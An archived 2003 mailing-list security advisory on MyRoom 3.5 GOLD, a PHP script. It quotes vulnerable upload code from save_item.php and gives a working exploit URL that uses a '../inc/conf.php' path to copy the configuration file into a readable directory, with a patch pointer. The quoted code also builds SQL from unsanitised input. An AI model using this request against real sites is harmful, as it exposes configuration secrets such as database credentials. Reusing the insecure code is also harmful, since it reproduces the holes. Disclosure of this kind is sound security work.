MyRoom (PHP)

From: Frog Man (leseulfrogat_private)
Date: Sat Jan 18 2003 - 16:42:39 PST

Next message: K B: "FTP delete file problem"

Previous message: RuxCon: "RUXCON - 12/13 April, 2003. SYDNEY, Australia."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Informations :
АААААААААААААА
Website : http://www.plansbiz.net
Version : 3.5 GOLD
Problems : File copy/upload


PHP Code/Location :
ААААААААААААААААААА
room/save_item.php :
------------------------------------------------------------------------
if($name == "" OR $ref == ""){
echo "You are fogot enter your 'ITEM NAME' or 'ITEM REF NO' !";
echo "<br>";
echo "<a href='$main_file?show=additem'>Try Agains [ Click Here ]</a>";
exit;
}

if($photo!="none" AND $photo!="application/octet-stream"){

	//get type of file
	$filetype=$photo_type;

	//get lenght of image type
	$filelenght=strlen($filetype);

	//get part of file image to build image extension
	$pos=strpos($filetype,"/")+1;

	//build extension of image
	$fileextention=substr($filetype,$pos,$filelenght);

	if($fileextention=="pjpeg"){
	$fileextention="jpg";
	}


	$image=date("YmdHis");
	$image.=".".$fileextention;
	$imgpath = "$imgroot";

	//if image exist, upload it in correct dir
	if($photov<>"none") {
	  if(!copy($photo,"$imgpath/$image")) {
		//display errors
		$msg="<br><font color='text00'>File Not Uploaded, it might be too large or 
does not exist..<br>Please Try Again!</font>";
		break;
	  }
	//or finish
	  else {
	  	dbconnect();
	  	$sql= "INSERT INTO room_item SET it_photo='$image', it_name='$name', 
it_decs='$decs', it_ab='$album', it_ref='$ref'";
		mysql_query($sql) or die(mysql_error());
		echo "<meta http-equiv='refresh' content='0;URL= 
$main_file?show=additem&m=1&i=$name'>";
	       	echo "<br>Your File Was Uploaded Sucessful!! <br><br><a 
href='$main_file?show=additem&m=1&i=$name'>Loading ......</a>";
	  }
	}

------------------------------------------------------------------------


Exploits :
АААААААААА
http://[target]/room/save_item.php?name=[NAME]&ref=hacked&photo=../inc/conf.php&photo_type=ttxt

+ http://[target]/room/index.php?show=search&search=it_name&item=[NAME]
to find the url of the txt file in wich is conf.php.

Patch :
ААААААА
A patch can be found on http://www.phpsecure.info (english version 
available) .


More Details :
АААААААААААААА
In French :
http://www.frog-man.org/tutos/MyRoom.txt

Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FMyRoom.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools




frog-m@n




_________________________________________________________________
MSN Search, le moteur de recherche qui pense comme vous ! 
http://search.msn.fr/worldwide.asp

Next message: K B: "FTP delete file problem"
Previous message: RuxCon: "RUXCON - 12/13 April, 2003. SYDNEY, Australia."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Jan 22 2003 - 00:45:37 PST